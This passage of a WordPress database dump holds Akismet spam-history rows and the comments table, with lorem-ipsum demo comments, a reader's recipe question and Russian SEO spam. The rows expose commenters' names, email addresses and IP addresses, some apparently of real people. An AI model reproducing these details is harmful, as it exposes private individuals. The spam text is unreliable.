:5:\"admin\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(42273,131,'akismet_history','a:4:{s:4:\"time\";d:1690882688.329463958740234375;s:5:\"event\";s:13:\"recheck-error\";s:4:\"user\";s:5:\"admin\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(42457,193,'akismet_history','a:4:{s:4:\"time\";d:1690882703.6244258880615234375;s:5:\"event\";s:13:\"recheck-error\";s:4:\"user\";s:5:\"admin\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(48218,10419,'akismet_history','a:3:{s:4:\"time\";d:1696921068.959848;s:5:\"event\";s:15:\"status-approved\";s:4:\"user\";s:5:\"admin\";}'),(48215,1752,'akismet_history','a:3:{s:4:\"time\";d:1696919364.037886;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48212,1762,'akismet_history','a:3:{s:4:\"time\";d:1696919364.029981;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48209,1769,'akismet_history','a:3:{s:4:\"time\";d:1696919364.022286;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48206,1822,'akismet_history','a:3:{s:4:\"time\";d:1696919364.014384;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48203,1882,'akismet_history','a:3:{s:4:\"time\";d:1696919363.998301;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48200,1927,'akismet_history','a:3:{s:4:\"time\";d:1696919363.993416;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48197,1972,'akismet_history','a:3:{s:4:\"time\";d:1696919363.988358;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48194,1992,'akismet_history','a:3:{s:4:\"time\";d:1696919363.983395;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48191,1999,'akismet_history','a:3:{s:4:\"time\";d:1696919363.978785;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48188,2003,'akismet_history','a:3:{s:4:\"time\";d:1696919363.974375;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48185,2011,'akismet_history','a:3:{s:4:\"time\";d:1696919363.969843;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48182,2015,'akismet_history','a:3:{s:4:\"time\";d:1696919363.96478;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48179,2019,'akismet_history','a:3:{s:4:\"time\";d:1696919363.960011;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48176,2022,'akismet_history','a:3:{s:4:\"time\";d:1696919363.955431;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48173,2024,'akismet_history','a:3:{s:4:\"time\";d:1696919363.950077;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48170,2026,'akismet_history','a:3:{s:4:\"time\";d:1696919363.945066;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48167,2036,'akismet_history','a:3:{s:4:\"time\";d:1696919363.939424;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48164,2039,'akismet_history','a:3:{s:4:\"time\";d:1696919363.934454;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48161,2042,'akismet_history','a:3:{s:4:\"time\";d:1696919363.929533;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48158,2045,'akismet_history','a:3:{s:4:\"time\";d:1696919363.92102;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48097,10414,'akismet_history','a:3:{s:4:\"time\";d:1692873664.729566;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48100,10415,'akismet_history','a:3:{s:4:\"time\";d:1692873666.485016;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48103,10417,'akismet_history','a:3:{s:4:\"time\";d:1692873667.585581;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48106,10418,'akismet_history','a:3:{s:4:\"time\";d:1692873668.966491;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'),(48109,10416,'akismet_history','a:3:{s:4:\"time\";d:1692873670.700032;s:5:\"event\";s:11:\"report-spam\";s:4:\"user\";s:5:\"admin\";}'); /*!40000 ALTER TABLE `wpvt_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_comments` -- DROP TABLE IF EXISTS `wpvt_comments`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_comments` ( `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0, `comment_author` tinytext NOT NULL, `comment_author_email` varchar(100) NOT NULL DEFAULT '', `comment_author_url` varchar(200) NOT NULL DEFAULT '', `comment_author_IP` varchar(100) NOT NULL DEFAULT '', `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_content` text NOT NULL, `comment_karma` int(11) NOT NULL DEFAULT 0, `comment_approved` varchar(20) NOT NULL DEFAULT '1', `comment_agent` varchar(255) NOT NULL DEFAULT '', `comment_type` varchar(20) NOT NULL DEFAULT 'comment', `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0, `user_id` bigint(20) unsigned NOT NULL DEFAULT 0, PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`), KEY `comment_author_email` (`comment_author_email`(10)), KEY `woo_idx_comment_type` (`comment_type`) ) ENGINE=MyISAM AUTO_INCREMENT=10428 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_comments` -- LOCK TABLES `wpvt_comments` WRITE; /*!40000 ALTER TABLE `wpvt_comments` DISABLE KEYS */; INSERT INTO `wpvt_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES (2,996,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:28:04','2018-02-04 15:28:04','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(3,996,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:30:11','2018-02-04 15:30:11','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',2,0),(4,996,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:32:17','2018-02-04 15:32:17','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(5,1002,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:34:14','2018-02-04 15:34:14','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(6,1002,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:36:27','2018-02-04 15:36:27','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',5,0),(8,1006,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:34:30','2018-02-04 15:34:30','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(9,1006,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:36:44','2018-02-04 15:36:44','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',8,0),(11,1011,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:34:46','2018-02-04 15:34:46','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(12,1011,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:37:23','2018-02-04 15:37:23','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',0,0),(14,1015,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:35:02','2018-02-04 15:35:02','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(15,1015,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:37:43','2018-02-04 15:37:43','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',14,0),(17,1019,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:35:18','2018-02-04 15:35:18','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(18,1019,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:38:04','2018-02-04 15:38:04','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',17,0),(20,1030,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:38:22','2018-02-04 15:38:22','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(21,1030,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:38:39','2018-02-04 15:38:39','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',20,0),(23,1033,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:35:44','2018-02-04 15:35:44','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(24,1033,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:39:00','2018-02-04 15:39:00','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',23,0),(26,1037,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:36:03','2018-02-04 15:36:03','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(27,1037,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:39:18','2018-02-04 15:39:18','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',26,0),(29,668,'Maria Johanson','mariajohanson100@outlook.com','http://maria12345','92.244.133.239','2018-02-04 15:14:54','2018-02-04 15:14:54','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(30,668,'Mia Wiolo','miawiolo@outlook.com','http://mia12345','92.244.133.239','2018-02-04 15:17:33','2018-02-04 15:17:33','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',29,0),(31,668,'Roberta Paolo','robertapaolo@outlook.com','http://roberta12345','92.244.133.239','2018-02-04 15:18:30','2018-02-04 15:18:30','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(32,722,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:19:28','2018-02-04 15:19:28','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(33,722,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:21:15','2018-02-04 15:21:15','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',32,0),(34,722,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:23:20','2018-02-04 15:23:20','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(35,733,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:19:49','2018-02-04 15:19:49','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(36,733,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:21:41','2018-02-04 15:21:41','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',35,0),(37,733,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:23:40','2018-02-04 15:23:40','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(38,753,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:20:06','2018-02-04 15:20:06','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(39,753,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:22:01','2018-02-04 15:22:01','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',38,0),(40,753,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:23:56','2018-02-04 15:23:56','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(41,762,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:20:23','2018-02-04 15:20:23','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(42,762,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:22:16','2018-02-04 15:22:16','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',0,0),(43,762,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:24:17','2018-02-04 15:24:17','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(44,781,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:20:39','2018-02-04 15:20:39','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(45,781,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:22:48','2018-02-04 15:22:48','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',44,0),(46,781,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:24:34','2018-02-04 15:24:34','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(47,825,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:26:35','2018-02-04 15:26:35','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(48,825,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:28:38','2018-02-04 15:28:38','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',47,0),(49,825,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:30:45','2018-02-04 15:30:45','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(50,844,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:26:54','2018-02-04 15:26:54','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(51,844,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:28:59','2018-02-04 15:28:59','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',50,0),(52,844,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:31:07','2018-02-04 15:31:07','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(53,875,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:27:12','2018-02-04 15:27:12','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(54,875,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:29:18','2018-02-04 15:29:18','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',53,0),(55,875,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:31:25','2018-02-04 15:31:25','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(56,902,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:27:30','2018-02-04 15:27:30','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(57,902,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:29:34','2018-02-04 15:29:34','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',56,0),(58,902,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:31:44','2018-02-04 15:31:44','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(59,910,'Maria Johanson','mariajohanson100@outlook.com','','92.244.133.239','2018-02-04 15:27:47','2018-02-04 15:27:47','Lorem ipsum dolor sit amet, at sed ferri nonumy, nec ad iuvaret dissentiet. Ne duo esse definiebas. Nam nullam commune recteque id, ei etiam delenit vel. Ad nec alienum appetere, ne mel affert sanctus recteque. Vis id probo invenire dissentias, dicta oporteat ei mel.',0,'1','','comment',0,0),(60,910,'Mia Wiolo','miawiolo@outlook.com','','92.244.133.239','2018-02-04 15:29:53','2018-02-04 15:29:53','Sea id vitae impetus debitis, ut est latine vulputate. Quas fugit tation qui ne, te pri exerci reprehendunt, cu vix probo omittam adolescens. Eu ceteros tractatos ullamcorper per, probatus expetenda mea in, mel eu mazim erroribus.',0,'1','','comment',59,0),(61,910,'Roberta Paolo','robertapaolo@outlook.com','','92.244.133.239','2018-02-04 15:32:01','2018-02-04 15:32:01','Alterum delicata mediocrem eam ex, has case prima dictas no, ex legimus suavitate patrioque ius. Quaeque iudicabit efficiantur no vim. Ius facilisis ullamcorper te, sumo regione tibique ius ne.',0,'1','','comment',0,0),(94,4750,'Rebecca','toverebecca@hotmail.com','','88.109.71.112','2020-05-07 14:20:28','2020-05-07 14:20:28','Hi, have tried this recipe a couple of times now and absolutely love it. I\'ve had to improvise on certain parts though, as you make no mention of when to add the cream, sugar, lemon juice or mustard. I\'ve assumed that it happens at the same time as the wine, but it\'s a bit frustrating that it\'s not included in the instructions. Would you please be able to clarify?',0,'0','Mozilla/5.0 (Android 10; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0','comment',0,0),(95,1106,'AvtoDrivenet','telev2isionvideo108@gmail.com','','95.55.51.250','2020-06-19 03:35:23','2020-06-19 03:35:23','Всем добрый день ! \r\nНаш клиент делиться опытом как он оформил для себя права на управление лодкой, если Вам хотелось-бы получить права ГИМС, обращайтесь к нашу компанию. \r\n \r\nhttp://moemesto.ru/pravadoxe/link/15149549',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36','review',0,0),(98,1106,'Krutimreada','potapin193@gmail.com','','217.107.199.104','2020-07-11 23:28:39','2020-07-11 23:28:39','Размещение ваших ссылок на ваш сайт в Яндекс Коллекции. \r\nЭти ссылки размещенные в Яндекс коллекциях влияют на рост позиций, рост трафика и вероятность повышения ИКС и никаких санкций от поисковиков. \r\nЭто будут внешние ссылки на ваш сайт с Яндекса, плюс возможно увеличение посетителей с Яндекс коллекций. \r\n \r\n50 ссылок на Яндекс Коллекции+БОНУС',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36','review',0,0),(99,1106,'Krutiwebreada','potapin193@gmail.com','','217.107.199.104','2020-07-13 23:37:18','2020-07-13 23:37:18','Многофункциональный блог независимых энтузиастов: \r\nПолезные советы, лучшие хитрости быта, интересные самоделки и многое другое. Предлагаем вам облегчить свою жизнь, воспользовавшись полезными советами на все случаи жизни! \r\n \r\n \r\n \r\nПричины разводов, Несовпадение материальных потребностей',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','review',0,0),(102,4659,'mapquest.com','jonellegreenfield@gawab.com','http://mapquest.com','185.189.115.18','2020-07-14 18:45:14','2020-07-14 18:45:14','Hi there! I know this is kind of off topic but I was wondering if you knew where I could find a captcha plugin for \r\nmy comment form? I\'m using the same blog platform as yours and I\'m \r\nhaving problems finding one? Thanks a lot!\r\n\r\nmy page ... mapquest.com',0,'0','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/66.0.3349.0 Safari/537.36','comment',0,0),(103,1106,'KaralinkaDug','elenatoivanen100@gmail.com','','178.71.243.76','2020-07-30 06:26:44','2020-07-30 06:26:44','Друзья, щедро делюсь с вами своим наблюдением. Нашла тут сайт, при добавлении на который, мой баннер размещается на всех сайтах сделанных одной web-студией, их не много, но они достойные! Есть посещаемые социальные сети и видно, что функционирующие Интернет магазины... \r\n \r\nКак по мне получить такую рекламу сразу всего за 5 рублей в сутки не плохой вариант. Да это ротатор, но метрика стала показывать заходы с этого сервиса и некоторые длятся почти два часа с четырьмя зелеными кружками, раньше такого я не замечала. \r\n \r\nЕсли что не так, не судите строго, посоветуйте, может я не права? \r\n \r\nПерейти на сайт баннерного 